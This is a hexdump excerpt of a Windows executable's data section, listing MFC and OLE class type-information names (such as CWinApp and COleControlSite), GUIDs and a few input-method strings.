00071a20  70 44 43 40 40 00 00 00  08 40 46 00 00 00 00 00  |pDC@@....@F.....|
00071a30  2e 3f 41 56 43 54 65 6d  70 47 64 69 4f 62 6a 65  |.?AVCTempGdiObje|
00071a40  63 74 40 40 00 00 00 00  08 40 46 00 00 00 00 00  |ct@@.....@F.....|
00071a50  2e 50 41 58 00 00 00 00  08 40 46 00 00 00 00 00  |.PAX.....@F.....|
00071a60  2e 50 41 56 43 4f 62 6a  65 63 74 40 40 00 00 00  |.PAVCObject@@...|
00071a70  08 40 46 00 00 00 00 00  2e 50 41 56 43 53 69 6d  |.@F......PAVCSim|
00071a80  70 6c 65 45 78 63 65 70  74 69 6f 6e 40 40 00 00  |pleException@@..|
00071a90  08 40 46 00 00 00 00 00  2e 50 41 56 43 52 65 73  |.@F......PAVCRes|
00071aa0  6f 75 72 63 65 45 78 63  65 70 74 69 6f 6e 40 40  |ourceException@@|
00071ab0  00 00 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |.........@F.....|
00071ac0  2e 3f 41 56 43 45 78 63  65 70 74 69 6f 6e 40 40  |.?AVCException@@|
00071ad0  00 00 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |.........@F.....|
00071ae0  2e 3f 41 56 43 53 69 6d  70 6c 65 45 78 63 65 70  |.?AVCSimpleExcep|
00071af0  74 69 6f 6e 40 40 00 00  08 40 46 00 00 00 00 00  |tion@@...@F.....|
00071b00  2e 3f 41 56 43 52 65 73  6f 75 72 63 65 45 78 63  |.?AVCResourceExc|
00071b10  65 70 74 69 6f 6e 40 40  00 00 00 00 00 00 00 00  |eption@@........|
00071b20  08 40 46 00 00 00 00 00  2e 3f 41 56 43 55 73 65  |.@F......?AVCUse|
00071b30  72 45 78 63 65 70 74 69  6f 6e 40 40 00 00 00 00  |rException@@....|
00071b40  08 40 46 00 00 00 00 00  2e 3f 41 56 43 46 72 61  |.@F......?AVCFra|
00071b50  6d 65 57 6e 64 40 40 00  08 40 46 00 00 00 00 00  |meWnd@@..@F.....|
00071b60  2e 3f 41 56 43 43 6f 6e  74 72 6f 6c 42 61 72 40  |.?AVCControlBar@|
00071b70  40 00 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |@........@F.....|
00071b80  2e 3f 41 56 43 44 69 61  6c 6f 67 42 61 72 40 40  |.?AVCDialogBar@@|
00071b90  00 00 00 00 ff ff ff ff  ff ff ff ff 00 00 00 00  |....⚠⚠⚠⚠⚠⚠⚠⚠....|
00071ba0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 54 6f 6f  |.@F......?AVCToo|
00071bb0  6c 42 61 72 40 40 00 00  08 40 46 00 00 00 00 00  |lBar@@...@F.....|
00071bc0  2e 3f 41 56 43 54 6f 6f  6c 43 6d 64 55 49 40 40  |.?AVCToolCmdUI@@|
00071bd0  00 00 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |.........@F.....|
00071be0  2e 3f 41 56 43 44 6f 63  6b 42 61 72 40 40 00 00  |.?AVCDockBar@@..|
00071bf0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 4d 69 6e  |.@F......?AVCMin|
00071c00  69 46 72 61 6d 65 57 6e  64 40 40 00 00 00 00 00  |iFrameWnd@@.....|
00071c10  08 40 46 00 00 00 00 00  2e 3f 41 56 43 4d 69 6e  |.@F......?AVCMin|
00071c20  69 44 6f 63 6b 46 72 61  6d 65 57 6e 64 40 40 00  |iDockFrameWnd@@.|
00071c30  44 1c 47 00 38 1c 47 00  ff ff ff ff 00 00 00 00  |D.G.8.G.⚠⚠⚠⚠....|
00071c40  00 00 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |.........@F.....|
00071c50  2e 3f 41 56 43 43 6f 6d  6d 6f 6e 44 69 61 6c 6f  |.?AVCCommonDialo|
00071c60  67 40 40 00 00 00 00 00  08 40 46 00 00 00 00 00  |g@@......@F.....|
00071c70  2e 3f 41 56 43 46 69 6c  65 44 69 61 6c 6f 67 40  |.?AVCFileDialog@|
00071c80  40 00 00 00 01 00 00 00  08 40 46 00 00 00 00 00  |@........@F.....|
00071c90  2e 3f 41 56 5f 41 46 58  5f 57 49 4e 5f 53 54 41  |.?AV_AFX_WIN_STA|
00071ca0  54 45 40 40 00 00 00 00  08 40 46 00 00 00 00 00  |TE@@.....@F.....|
00071cb0  2e 3f 41 56 43 57 69 6e  54 68 72 65 61 64 40 40  |.?AVCWinThread@@|
00071cc0  00 00 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |.........@F.....|
00071cd0  2e 3f 41 56 43 57 69 6e  41 70 70 40 40 00 00 00  |.?AVCWinApp@@...|
00071ce0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 43 6f 6d  |.@F......?AVCCom|
00071cf0  6d 61 6e 64 4c 69 6e 65  49 6e 66 6f 40 40 00 00  |mandLineInfo@@..|
00071d00  08 40 46 00 00 00 00 00  2e 3f 41 56 5f 41 46 58  |.@F......?AV_AFX|
00071d10  5f 43 54 4c 33 44 5f 54  48 52 45 41 44 40 40 00  |_CTL3D_THREAD@@.|
00071d20  08 40 46 00 00 00 00 00  2e 3f 41 56 43 44 6f 63  |.@F......?AVCDoc|
00071d30  54 65 6d 70 6c 61 74 65  40 40 00 00 00 00 00 00  |Template@@......|
00071d40  08 40 46 00 00 00 00 00  2e 3f 41 56 43 53 69 6e  |.@F......?AVCSin|
00071d50  67 6c 65 44 6f 63 54 65  6d 70 6c 61 74 65 40 40  |gleDocTemplate@@|
00071d60  00 00 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |.........@F.....|
00071d70  2e 3f 41 56 43 4f 63 63  4d 61 6e 61 67 65 72 40  |.?AVCOccManager@|
00071d80  40 00 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |@........@F.....|
00071d90  2e 3f 41 56 43 46 69 6c  65 40 40 00 00 00 00 00  |.?AVCFile@@.....|
00071da0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 4d 69 72  |.@F......?AVCMir|
00071db0  72 6f 72 46 69 6c 65 40  40 00 00 00 00 00 00 00  |rorFile@@.......|
00071dc0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 46 69 6c  |.@F......?AVCFil|
00071dd0  65 45 78 63 65 70 74 69  6f 6e 40 40 00 00 00 00  |eException@@....|
00071de0  10 59 2f b6 28 65 d1 11  96 11 00 00 f8 1e 0d 0d  |.Y/⚠(e⚠.....⚠...|
00071df0  80 15 46 00 14 00 00 00  00 00 00 00 74 fd 44 00  |..F.........t⚠D.|
00071e00  f0 14 46 00 00 00 00 00  08 40 46 00 00 00 00 00  |⚠.F......@F.....|
00071e10  2e 3f 41 56 43 4f 62 41  72 72 61 79 40 40 00 00  |.?AVCObArray@@..|
00071e20  08 40 46 00 00 00 00 00  2e 3f 41 56 43 56 69 65  |.@F......?AVCVie|
00071e30  77 40 40 00 00 00 00 00  08 40 46 00 00 00 00 00  |w@@......@F.....|
00071e40  2e 3f 41 56 43 53 63 72  6f 6c 6c 56 69 65 77 40  |.?AVCScrollView@|
00071e50  40 00 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |@........@F.....|
00071e60  2e 3f 41 56 43 50 72 65  76 69 65 77 56 69 65 77  |.?AVCPreviewView|
00071e70  40 40 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |@@.......@F.....|
00071e80  2e 3f 41 56 43 50 72 69  6e 74 69 6e 67 44 69 61  |.?AVCPrintingDia|
00071e90  6c 6f 67 40 40 00 00 00  08 40 46 00 00 00 00 00  |log@@....@F.....|
00071ea0  2e 3f 41 56 43 4d 65 6e  75 40 40 00 00 00 00 00  |.?AVCMenu@@.....|
00071eb0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 54 65 6d  |.@F......?AVCTem|
00071ec0  70 4d 65 6e 75 40 40 00  08 40 46 00 00 00 00 00  |pMenu@@..@F.....|
00071ed0  2e 3f 41 56 5f 41 46 58  5f 54 48 52 45 41 44 5f  |.?AV_AFX_THREAD_|
00071ee0  53 54 41 54 45 40 40 00  08 40 46 00 00 00 00 00  |STATE@@..@F.....|
00071ef0  2e 3f 41 56 41 46 58 5f  4d 4f 44 55 4c 45 5f 53  |.?AVAFX_MODULE_S|
00071f00  54 41 54 45 40 40 00 00  08 40 46 00 00 00 00 00  |TATE@@...@F.....|
00071f10  2e 3f 41 56 41 46 58 5f  4d 4f 44 55 4c 45 5f 54  |.?AVAFX_MODULE_T|
00071f20  48 52 45 41 44 5f 53 54  41 54 45 40 40 00 00 00  |HREAD_STATE@@...|
00071f30  08 40 46 00 00 00 00 00  2e 3f 41 56 5f 41 46 58  |.@F......?AV_AFX|
00071f40  5f 42 41 53 45 5f 4d 4f  44 55 4c 45 5f 53 54 41  |_BASE_MODULE_STA|
00071f50  54 45 40 40 00 00 00 00  08 40 46 00 00 00 00 00  |TE@@.....@F.....|
00071f60  2e 50 41 56 43 4d 65 6d  6f 72 79 45 78 63 65 70  |.PAVCMemoryExcep|
00071f70  74 69 6f 6e 40 40 00 00  08 40 46 00 00 00 00 00  |tion@@...@F.....|
00071f80  2e 50 41 56 43 4e 6f 74  53 75 70 70 6f 72 74 65  |.PAVCNotSupporte|
00071f90  64 45 78 63 65 70 74 69  6f 6e 40 40 00 00 00 00  |dException@@....|
00071fa0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 4d 65 6d  |.@F......?AVCMem|
00071fb0  6f 72 79 45 78 63 65 70  74 69 6f 6e 40 40 00 00  |oryException@@..|
00071fc0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 4e 6f 74  |.@F......?AVCNot|
00071fd0  53 75 70 70 6f 72 74 65  64 45 78 63 65 70 74 69  |SupportedExcepti|
00071fe0  6f 6e 40 40 00 00 00 00  08 40 46 00 00 00 00 00  |on@@.....@F.....|
00071ff0  2e 3f 41 55 43 54 68 72  65 61 64 44 61 74 61 40  |.?AUCThreadData@|
00072000  40 00 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |@........@F.....|
00072010  2e 3f 41 56 43 48 61 6e  64 6c 65 4d 61 70 40 40  |.?AVCHandleMap@@|
00072020  00 00 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |.........@F.....|
00072030  2e 3f 41 56 43 4d 61 70  50 74 72 54 6f 50 74 72  |.?AVCMapPtrToPtr|
00072040  40 40 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |@@.......@F.....|
00072050  2e 3f 41 56 43 50 74 72  4c 69 73 74 40 40 00 00  |.?AVCPtrList@@..|
00072060  08 40 46 00 00 00 00 00  2e 3f 41 56 43 4d 61 70  |.@F......?AVCMap|
00072070  53 74 72 69 6e 67 54 6f  50 74 72 40 40 00 00 00  |StringToPtr@@...|
00072080  08 40 46 00 00 00 00 00  2e 3f 41 56 43 50 74 72  |.@F......?AVCPtr|
00072090  41 72 72 61 79 40 40 00  08 40 46 00 00 00 00 00  |Array@@..@F.....|
000720a0  2e 3f 41 56 43 44 6f 63  6b 43 6f 6e 74 65 78 74  |.?AVCDockContext|
000720b0  40 40 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |@@.......@F.....|
000720c0  2e 3f 41 56 43 50 61 67  65 53 65 74 75 70 44 69  |.?AVCPageSetupDi|
000720d0  61 6c 6f 67 40 40 00 00  08 40 46 00 00 00 00 00  |alog@@...@F.....|
000720e0  2e 3f 41 56 43 50 72 69  6e 74 44 69 61 6c 6f 67  |.?AVCPrintDialog|
000720f0  40 40 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |@@.......@F.....|
00072100  2e 3f 41 56 43 52 65 63  65 6e 74 46 69 6c 65 4c  |.?AVCRecentFileL|
00072110  69 73 74 40 40 00 00 00  08 40 46 00 00 00 00 00  |ist@@....@F.....|
00072120  2e 3f 41 56 43 44 6f 63  4d 61 6e 61 67 65 72 40  |.?AVCDocManager@|
00072130  40 00 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |@........@F.....|
00072140  2e 3f 41 56 43 4e 65 77  54 79 70 65 44 6c 67 40  |.?AVCNewTypeDlg@|
00072150  40 00 00 00 ff ff ff ff  ff ff ff ff 00 00 00 00  |@...⚠⚠⚠⚠⚠⚠⚠⚠....|
00072160  08 40 46 00 00 00 00 00  2e 3f 41 55 49 50 61 72  |.@F......?AUIPar|
00072170  73 65 44 69 73 70 6c 61  79 4e 61 6d 65 40 40 00  |seDisplayName@@.|
00072180  08 40 46 00 00 00 00 00  2e 3f 41 55 49 4f 6c 65  |.@F......?AUIOle|
00072190  43 6f 6e 74 61 69 6e 65  72 40 40 00 00 00 00 00  |Container@@.....|
000721a0  08 40 46 00 00 00 00 00  2e 3f 41 56 58 4f 6c 65  |.@F......?AVXOle|
000721b0  43 6f 6e 74 61 69 6e 65  72 40 43 4f 6c 65 43 6f  |Container@COleCo|
000721c0  6e 74 72 6f 6c 43 6f 6e  74 61 69 6e 65 72 40 40  |ntrolContainer@@|
000721d0  00 00 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |.........@F.....|
000721e0  2e 3f 41 55 49 55 6e 6b  6e 6f 77 6e 40 40 00 00  |.?AUIUnknown@@..|
000721f0  08 40 46 00 00 00 00 00  2e 3f 41 55 49 4f 6c 65  |.@F......?AUIOle|
00072200  57 69 6e 64 6f 77 40 40  00 00 00 00 00 00 00 00  |Window@@........|
00072210  08 40 46 00 00 00 00 00  2e 3f 41 55 49 4f 6c 65  |.@F......?AUIOle|
00072220  49 6e 50 6c 61 63 65 55  49 57 69 6e 64 6f 77 40  |InPlaceUIWindow@|
00072230  40 00 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |@........@F.....|
00072240  2e 3f 41 55 49 4f 6c 65  49 6e 50 6c 61 63 65 46  |.?AUIOleInPlaceF|
00072250  72 61 6d 65 40 40 00 00  08 40 46 00 00 00 00 00  |rame@@...@F.....|
00072260  2e 3f 41 56 58 4f 6c 65  49 50 46 72 61 6d 65 40  |.?AVXOleIPFrame@|
00072270  43 4f 6c 65 43 6f 6e 74  72 6f 6c 43 6f 6e 74 61  |COleControlConta|
00072280  69 6e 65 72 40 40 00 00  08 40 46 00 00 00 00 00  |iner@@...@F.....|
00072290  2e 3f 41 56 43 4f 6c 65  43 6f 6e 74 72 6f 6c 43  |.?AVCOleControlC|
000722a0  6f 6e 74 61 69 6e 65 72  40 40 00 00 00 00 00 00  |ontainer@@......|
000722b0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 46 6f 6e  |.@F......?AVCFon|
000722c0  74 40 40 00 00 00 00 00  08 40 46 00 00 00 00 00  |t@@......@F.....|
000722d0  2e 3f 41 56 43 45 6e 75  6d 41 72 72 61 79 40 40  |.?AVCEnumArray@@|
000722e0  00 00 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |.........@F.....|
000722f0  2e 3f 41 56 43 45 6e 75  6d 55 6e 6b 6e 6f 77 6e  |.?AVCEnumUnknown|
00072300  40 40 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |@@.......@F.....|
00072310  2e 3f 41 55 49 52 6f 77  73 65 74 4e 6f 74 69 66  |.?AUIRowsetNotif|
00072320  79 40 40 00 00 00 00 00  08 40 46 00 00 00 00 00  |y@@......@F.....|
00072330  2e 3f 41 56 58 52 6f 77  73 65 74 4e 6f 74 69 66  |.?AVXRowsetNotif|
00072340  79 40 43 4f 6c 65 43 6f  6e 74 72 6f 6c 53 69 74  |y@COleControlSit|
00072350  65 40 40 00 00 00 00 00  08 40 46 00 00 00 00 00  |e@@......@F.....|
00072360  2e 3f 41 55 49 4e 6f 74  69 66 79 44 42 45 76 65  |.?AUINotifyDBEve|
00072370  6e 74 73 40 40 00 00 00  08 40 46 00 00 00 00 00  |nts@@....@F.....|
00072380  2e 3f 41 56 58 4e 6f 74  69 66 79 44 42 45 76 65  |.?AVXNotifyDBEve|
00072390  6e 74 73 40 43 4f 6c 65  43 6f 6e 74 72 6f 6c 53  |nts@COleControlS|
000723a0  69 74 65 40 40 00 00 00  08 40 46 00 00 00 00 00  |ite@@....@F.....|
000723b0  2e 3f 41 55 49 42 6f 75  6e 64 4f 62 6a 65 63 74  |.?AUIBoundObject|
000723c0  53 69 74 65 40 40 00 00  08 40 46 00 00 00 00 00  |Site@@...@F.....|
000723d0  2e 3f 41 56 58 42 6f 75  6e 64 4f 62 6a 65 63 74  |.?AVXBoundObject|
000723e0  53 69 74 65 40 43 4f 6c  65 43 6f 6e 74 72 6f 6c  |Site@COleControl|
000723f0  53 69 74 65 40 40 00 00  08 40 46 00 00 00 00 00  |Site@@...@F.....|
00072400  2e 3f 41 56 58 45 76 65  6e 74 53 69 6e 6b 40 43  |.?AVXEventSink@C|
00072410  4f 6c 65 43 6f 6e 74 72  6f 6c 53 69 74 65 40 40  |OleControlSite@@|
00072420  00 00 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |.........@F.....|
00072430  2e 3f 41 55 49 50 72 6f  70 65 72 74 79 4e 6f 74  |.?AUIPropertyNot|
00072440  69 66 79 53 69 6e 6b 40  40 00 00 00 00 00 00 00  |ifySink@@.......|
00072450  08 40 46 00 00 00 00 00  2e 3f 41 56 58 50 72 6f  |.@F......?AVXPro|
00072460  70 65 72 74 79 4e 6f 74  69 66 79 53 69 6e 6b 40  |pertyNotifySink@|
00072470  43 4f 6c 65 43 6f 6e 74  72 6f 6c 53 69 74 65 40  |COleControlSite@|
00072480  40 00 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |@........@F.....|
00072490  2e 3f 41 55 49 44 69 73  70 61 74 63 68 40 40 00  |.?AUIDispatch@@.|
000724a0  08 40 46 00 00 00 00 00  2e 3f 41 56 58 41 6d 62  |.@F......?AVXAmb|
000724b0  69 65 6e 74 50 72 6f 70  73 40 43 4f 6c 65 43 6f  |ientProps@COleCo|
000724c0  6e 74 72 6f 6c 53 69 74  65 40 40 00 00 00 00 00  |ntrolSite@@.....|
000724d0  08 40 46 00 00 00 00 00  2e 3f 41 55 49 4f 6c 65  |.@F......?AUIOle|
000724e0  43 6f 6e 74 72 6f 6c 53  69 74 65 40 40 00 00 00  |ControlSite@@...|
000724f0  08 40 46 00 00 00 00 00  2e 3f 41 56 58 4f 6c 65  |.@F......?AVXOle|
00072500  43 6f 6e 74 72 6f 6c 53  69 74 65 40 43 4f 6c 65  |ControlSite@COle|
00072510  43 6f 6e 74 72 6f 6c 53  69 74 65 40 40 00 00 00  |ControlSite@@...|
00072520  08 40 46 00 00 00 00 00  2e 3f 41 55 49 4f 6c 65  |.@F......?AUIOle|
00072530  49 6e 50 6c 61 63 65 53  69 74 65 40 40 00 00 00  |InPlaceSite@@...|
00072540  08 40 46 00 00 00 00 00  2e 3f 41 56 58 4f 6c 65  |.@F......?AVXOle|
00072550  49 50 53 69 74 65 40 43  4f 6c 65 43 6f 6e 74 72  |IPSite@COleContr|
00072560  6f 6c 53 69 74 65 40 40  00 00 00 00 00 00 00 00  |olSite@@........|
00072570  08 40 46 00 00 00 00 00  2e 3f 41 55 49 4f 6c 65  |.@F......?AUIOle|
00072580  43 6c 69 65 6e 74 53 69  74 65 40 40 00 00 00 00  |ClientSite@@....|
00072590  08 40 46 00 00 00 00 00  2e 3f 41 56 58 4f 6c 65  |.@F......?AVXOle|
000725a0  43 6c 69 65 6e 74 53 69  74 65 40 43 4f 6c 65 43  |ClientSite@COleC|
000725b0  6f 6e 74 72 6f 6c 53 69  74 65 40 40 00 00 00 00  |ontrolSite@@....|
000725c0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 4f 6c 65  |.@F......?AVCOle|
000725d0  43 6f 6e 74 72 6f 6c 53  69 74 65 40 40 00 00 00  |ControlSite@@...|
000725e0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 44 61 74  |.@F......?AVCDat|
000725f0  61 53 6f 75 72 63 65 43  6f 6e 74 72 6f 6c 40 40  |aSourceControl@@|
00072600  00 00 00 00 00 00 00 00  05 3a 73 0c 1c 2a ce 11  |.........:s..*⚠.|
00072610  ad e5 00 aa 00 44 77 3d  11 3a 73 0c 1c 2a ce 11  |⚠⚠.⚠.Dw=.:s..*⚠.|
00072620  ad e5 00 aa 00 44 77 3d  8c 3a 73 0c 1c 2a ce 11  |⚠⚠.⚠.Dw=.:s..*⚠.|
00072630  ad e5 00 aa 00 44 77 3d  08 40 46 00 00 00 00 00  |⚠⚠.⚠.Dw=.@F.....|
00072640  2e 3f 41 56 43 4d 65 6d  46 69 6c 65 40 40 00 00  |.?AVCMemFile@@..|
00072650  08 40 46 00 00 00 00 00  2e 50 41 56 43 46 69 6c  |.@F......PAVCFil|
00072660  65 45 78 63 65 70 74 69  6f 6e 40 40 00 00 00 00  |eException@@....|
00072670  08 40 46 00 00 00 00 00  2e 3f 41 56 43 41 72 63  |.@F......?AVCArc|
00072680  68 69 76 65 45 78 63 65  70 74 69 6f 6e 40 40 00  |hiveException@@.|
00072690  08 40 46 00 00 00 00 00  2e 50 41 56 43 41 72 63  |.@F......PAVCArc|
000726a0  68 69 76 65 45 78 63 65  70 74 69 6f 6e 40 40 00  |hiveException@@.|
000726b0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 50 72 65  |.@F......?AVCPre|
000726c0  76 69 65 77 44 43 40 40  00 00 00 00 00 00 00 00  |viewDC@@........|
000726d0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 54 6f 6f  |.@F......?AVCToo|
000726e0  6c 54 69 70 43 74 72 6c  40 40 00 00 00 00 00 00  |lTipCtrl@@......|
000726f0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 52 67 6e  |.@F......?AVCRgn|
00072700  40 40 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |@@.......@F.....|
00072710  2e 3f 41 56 43 4f 6c 65  44 69 73 70 61 74 63 68  |.?AVCOleDispatch|
00072720  49 6d 70 6c 40 40 00 00  08 40 46 00 00 00 00 00  |Impl@@...@F.....|
00072730  2e 50 41 56 43 4f 6c 65  45 78 63 65 70 74 69 6f  |.PAVCOleExceptio|
00072740  6e 40 40 00 00 00 00 00  08 40 46 00 00 00 00 00  |n@@......@F.....|
00072750  2e 3f 41 56 43 4f 6c 65  44 69 73 70 61 74 63 68  |.?AVCOleDispatch|
00072760  45 78 63 65 70 74 69 6f  6e 40 40 00 00 00 00 00  |Exception@@.....|
00072770  08 40 46 00 00 00 00 00  2e 50 41 56 43 4f 6c 65  |.@F......PAVCOle|
00072780  44 69 73 70 61 74 63 68  45 78 63 65 70 74 69 6f  |DispatchExceptio|
00072790  6e 40 40 00 00 00 00 00  1f 00 00 00 3b 00 00 00  |n@@.........;...|
000727a0  5a 00 00 00 78 00 00 00  97 00 00 00 b5 00 00 00  |Z...x.......⚠...|
000727b0  d4 00 00 00 f3 00 00 00  11 01 00 00 30 01 00 00  |⚠...⚠.......0...|
000727c0  4e 01 00 00 6d 01 00 00  08 40 46 00 00 00 00 00  |N...m....@F.....|
000727d0  2e 3f 41 56 43 49 6e 6e  65 72 55 6e 6b 6e 6f 77  |.?AVCInnerUnknow|
000727e0  6e 40 40 00 00 00 00 00  08 40 46 00 00 00 00 00  |n@@......@F.....|
000727f0  2e 3f 41 55 49 45 6e 75  6d 56 4f 49 44 40 40 00  |.?AUIEnumVOID@@.|
00072800  08 40 46 00 00 00 00 00  2e 3f 41 56 58 45 6e 75  |.@F......?AVXEnu|
00072810  6d 56 4f 49 44 40 43 45  6e 75 6d 41 72 72 61 79  |mVOID@CEnumArray|
00072820  40 40 00 00 ff ff ff ff  08 40 46 00 00 00 00 00  |@@..⚠⚠⚠⚠.@F.....|
00072830  2e 3f 41 55 49 53 65 71  75 65 6e 74 69 61 6c 53  |.?AUISequentialS|
00072840  74 72 65 61 6d 40 40 00  08 40 46 00 00 00 00 00  |tream@@..@F.....|
00072850  2e 3f 41 55 49 53 74 72  65 61 6d 40 40 00 00 00  |.?AUIStream@@...|
00072860  08 40 46 00 00 00 00 00  2e 3f 41 56 43 41 72 63  |.@F......?AVCArc|
00072870  68 69 76 65 53 74 72 65  61 6d 40 40 00 00 00 00  |hiveStream@@....|
00072880  08 40 46 00 00 00 00 00  2e 3f 41 56 43 54 79 70  |.@F......?AVCTyp|
00072890  65 4c 69 62 43 61 63 68  65 4d 61 70 40 40 00 00  |eLibCacheMap@@..|
000728a0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 4f 6c 65  |.@F......?AVCOle|
000728b0  45 78 63 65 70 74 69 6f  6e 40 40 00 00 00 00 00  |Exception@@.....|
000728c0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 4f 6c 65  |.@F......?AVCOle|
000728d0  4d 65 73 73 61 67 65 46  69 6c 74 65 72 40 40 00  |MessageFilter@@.|
000728e0  08 40 46 00 00 00 00 00  2e 3f 41 55 49 4d 65 73  |.@F......?AUIMes|
000728f0  73 61 67 65 46 69 6c 74  65 72 40 40 00 00 00 00  |sageFilter@@....|
00072900  08 40 46 00 00 00 00 00  2e 3f 41 56 58 4d 65 73  |.@F......?AVXMes|
00072910  73 61 67 65 46 69 6c 74  65 72 40 43 4f 6c 65 4d  |sageFilter@COleM|
00072920  65 73 73 61 67 65 46 69  6c 74 65 72 40 40 00 00  |essageFilter@@..|
00072930  08 40 46 00 00 00 00 00  2e 3f 41 56 43 4f 6c 65  |.@F......?AVCOle|
00072940  43 6f 6e 74 72 6f 6c 4c  6f 63 6b 40 40 00 00 00  |ControlLock@@...|
00072950  08 40 46 00 00 00 00 00  2e 3f 41 56 43 4f 6c 65  |.@F......?AVCOle|
00072960  4f 62 6a 65 63 74 46 61  63 74 6f 72 79 40 40 00  |ObjectFactory@@.|
00072970  08 40 46 00 00 00 00 00  2e 3f 41 55 49 43 6c 61  |.@F......?AUICla|
00072980  73 73 46 61 63 74 6f 72  79 40 40 00 00 00 00 00  |ssFactory@@.....|
00072990  08 40 46 00 00 00 00 00  2e 3f 41 55 49 43 6c 61  |.@F......?AUICla|
000729a0  73 73 46 61 63 74 6f 72  79 32 40 40 00 00 00 00  |ssFactory2@@....|
000729b0  08 40 46 00 00 00 00 00  2e 3f 41 56 58 43 6c 61  |.@F......?AVXCla|
000729c0  73 73 46 61 63 74 6f 72  79 40 43 4f 6c 65 4f 62  |ssFactory@COleOb|
000729d0  6a 65 63 74 46 61 63 74  6f 72 79 40 40 00 00 00  |jectFactory@@...|
000729e0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 4f 6c 65  |.@F......?AVCOle|
000729f0  44 61 74 61 53 6f 75 72  63 65 40 40 00 00 00 00  |DataSource@@....|
00072a00  08 40 46 00 00 00 00 00  2e 3f 41 55 49 44 61 74  |.@F......?AUIDat|
00072a10  61 4f 62 6a 65 63 74 40  40 00 00 00 00 00 00 00  |aObject@@.......|
00072a20  08 40 46 00 00 00 00 00  2e 3f 41 56 58 44 61 74  |.@F......?AVXDat|
00072a30  61 4f 62 6a 65 63 74 40  43 4f 6c 65 44 61 74 61  |aObject@COleData|
00072a40  53 6f 75 72 63 65 40 40  00 00 00 00 00 00 00 00  |Source@@........|
00072a50  08 40 46 00 00 00 00 00  2e 3f 41 56 43 45 6e 75  |.@F......?AVCEnu|
00072a60  6d 46 6f 72 6d 61 74 45  74 63 40 40 00 00 00 00  |mFormatEtc@@....|
00072a70  08 40 46 00 00 00 00 00  2e 3f 41 56 43 4f 6c 65  |.@F......?AVCOle|
00072a80  44 69 61 6c 6f 67 40 40  00 00 00 00 00 00 00 00  |Dialog@@........|
00072a90  08 40 46 00 00 00 00 00  2e 3f 41 56 43 4f 6c 65  |.@F......?AVCOle|
00072aa0  42 75 73 79 44 69 61 6c  6f 67 40 40 00 00 00 00  |BusyDialog@@....|
00072ab0  08 40 46 00 00 00 00 00  2e 3f 41 56 5f 41 46 58  |.@F......?AV_AFX|
00072ac0  5f 4f 4c 45 5f 53 54 41  54 45 40 40 00 00 00 00  |_OLE_STATE@@....|
00072ad0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 4f 6c 65  |.@F......?AVCOle|
00072ae0  53 74 72 65 61 6d 46 69  6c 65 40 40 00 00 00 00  |StreamFile@@....|
00072af0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 53 68 61  |.@F......?AVCSha|
00072b00  72 65 64 46 69 6c 65 40  40 00 00 00 20 05 93 19  |redFile@@... ...|
00072b10  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00072b20  f7 dc 41 00 02 00 00 00  08 40 46 00 00 00 00 00  |⚠⚠A......@F.....|
00072b30  2e 3f 41 56 74 79 70 65  5f 69 6e 66 6f 40 40 00  |.?AVtype_info@@.|
00072b40  e4 35 42 00 00 00 00 00  00 00 00 00 00 00 00 00  |⚠5B.............|
00072b50  01 02 04 08 00 00 00 00  a4 03 00 00 60 82 79 82  |........⚠...`.y.|
00072b60  21 00 00 00 00 00 00 00  a6 df 00 00 00 00 00 00  |!.......⚠⚠......|
[....]
00074390  50 83 22 18 4e 4b 65 62  fd 83 8f af 06 94 7d 11  |P.".NKeb⚠..⚠..}.|
000743a0  e4 2d de 9f ce d2 c8 04  dd a6 d8 0a 65 64 69 74  |⚠-⚠.⚠⚠⚠.⚠⚠⚠.edit|
000743b0  00 00 00 00 68 61 6e 67  65 75 6c 00 6b 61 6e 6a  |....hangeul.kanj|
000743c0  69 00 00 00 65 6e 67 6c  69 73 68 00 72 6f 6d 61  |i...english.roma|
000743d0  6e 00 00 00 68 61 6e 67  65 75 6c 6d 65 6e 75 00  |n...hangeulmenu.|
000743e0  6b 61 6e 6a 69 6d 65 6e  75 00 00 00 77 69 6e 64  |kanjimenu...wind|
000743f0  6f 77 73 00 43 33 64 48  4e 65 77 00 43 33 64 4c  |ows.C3dHNew.C3dL|
00074400  4e 65 77 00 43 33 64 4e  65 77 00 00 43 33 64 48  |New.C3dNew..C3dH|
